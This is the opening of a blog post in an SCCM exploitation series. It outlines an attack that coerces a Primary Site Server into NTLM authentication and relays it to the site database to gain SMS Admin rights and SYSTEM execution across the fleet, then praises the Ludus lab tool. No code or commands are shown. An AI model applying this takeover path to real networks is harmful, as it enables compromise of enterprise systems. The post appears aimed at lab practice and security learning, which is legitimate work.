Hierarchy Takeover via NTLM Coercion and Relay to MSSQL

Introduction

This post is part of a series on SCCM exploitation. If you haven’t yet, don’t miss SCCM Range Deployment — it’s like setting up your own SCCM sandbox, minus the sand in your underwear.

At the end of this post, you will know how to coerce a SCCM Primary Site Server into authenticating against you, and relay that authentication back to the Server Site Database. What for you might ask? To make an arbitrary domain account a member of the SMS Admins group, which, granted the right permissions at the database level, will give you remote command execution as SYSTEM on the entire SCCM fleet.

SCCM Range Deployment

If you’ve never heard of Ludus, I almost feel bad for you. Because once you know, there’s no going back. This absolute game-changer is about to save you HOURS, and I’m basically your hero for telling you about it. You’re welcome. I’ve just changed your life, so feel free to name your firstborn after me.

Now, let’s give credit when credit is due. Who built that thing?

A talented person by the name of Erik Hunstad who also happens to be the founder of badsectorlabs.